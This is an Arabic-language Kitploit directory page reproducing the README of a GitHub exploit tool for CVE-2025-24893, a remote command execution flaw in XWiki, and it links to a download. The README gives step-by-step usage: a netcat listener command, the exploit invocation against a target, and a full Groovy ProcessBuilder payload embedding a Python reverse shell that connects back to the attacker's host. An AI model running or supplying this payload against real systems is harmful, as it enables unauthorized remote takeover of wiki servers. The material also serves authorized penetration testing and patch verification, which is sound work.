Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-24893 — استغلال معدل لـ CVE-2025-24893 | Kitploit
أدوات/GitHubGitHub/hackersonsteroids/cve-2025-24893
الاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعدتطوير الحمولات
GitHubhackersonsteroids/cve-2025-24893

cve-2025-24893

استغلال معدل لـ CVE-2025-24893

عرض المستودع
5منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال ثغرة CVE-2025-24893 لتنفيذ أوامر عن بعد في XWiki

Exploit Banner

نص بايثون 3 بسيط لاستغلال CVE-2025-24893، وهي ثغرة تنفيذ أوامر عن بعد في منصة XWiki، باستخدام ماكرو غير متزامن قائم على Groovy وحمولة شل عكسية قابلة للتكوين.

⚠️ تحذير: هذه الأداة مقدمة لأغراض تعليمية واختبارية مصرح بها فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني وغير أخلاقي.


جدول المحتويات

  • الميزات
  • المتطلبات
  • التثبيت
  • الاستخدام
  • الكشف والتراجع عن البروتوكول
  • حمولة الشل العكسية
  • الترخيص
  • إخلاء المسؤولية

الميزات

  • ✅ يكتشف تلقائيًا ما إذا كان الهدف يدعم HTTPS أو HTTP
  • ✅ يصنع مقتطف Groovy ProcessBuilder لتجنب مشاكل Runtime.exec
  • ✅ يقوم بترميز حمولة ماكرو XWiki غير المتزامن+Groovy بتشفير URL
  • ✅ شل عكسية قابلة للتكوين (المضيف + المنفذ)
  • ✅ يطبع رمز استجابة HTTP للمساعدة في التحقق من التسليم

المتطلبات

  • بايثون 3.6 أو أعلى
  • مكتبة requests
root@kitploit:~
pip install requests

التثبيت

استنساخ هذا المستودع:

root@kitploit:~
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893

الاستخدام

root@kitploit:~
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
  • <TARGET_DOMAIN> مضيف XWiki (مثل wiki.example.local).

  • <LHOST> عنوان IP لجهاز المهاجم (حيث يعمل المستمع الخاص بك).

  • <LPORT> منفذ المستمع (عدد صحيح).


مثال

  1. تشغيل مستمع على جهازك:
root@kitploit:~
nc -lvnp 4444
  1. تشغيل أداة الاستغلال:
root@kitploit:~
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
  1. عند النجاح، تحقق من مستمع netcat الخاص بك للحصول على شل.

الكشف والتراجع عن البروتوكول

قبل إرسال الحمولة، يقوم النص بـ:

  1. يحاول https://<TARGET_DOMAIN>
  2. يتراجع إلى http://<TARGET_DOMAIN> إذا فشل HTTPS
  3. يخرج إذا لم يكن أي منهما متاحًا

يساعد هذا في ضمان التوافق مع النشرات المختلطة البروتوكول.


حمولة الشل العكسية

افتراضيًا، يستخدم النص سطرًا واحدًا من بايثون 3:

root@kitploit:~
new ProcessBuilder(
  ['/bin/bash','-c',
   'python3 -c \'import socket,subprocess,os;'
   's=socket.socket();s.connect(("LHOST",LPORT));'
   'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
   'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
  • يمكنك تعديل دالة build_payload() إذا كنت بحاجة إلى شل مختلفة (مثل Bash، Perl، PHP، إلخ).

الترخيص

هذا المشروع مرخص بموجب رخصة MIT. راجع ملف LICENSE للتفاصيل.


إخلاء المسؤولية

هذه الأداة مصممة لتقييم الأمن المصرح به والأغراض التعليمية فقط. لا يتحمل المؤلفون أي مسؤولية عن سوء الاستخدام. احصل دائمًا على إذن صريح قبل اختبار أي أنظمة مستهدفة.

تنزيل الأداة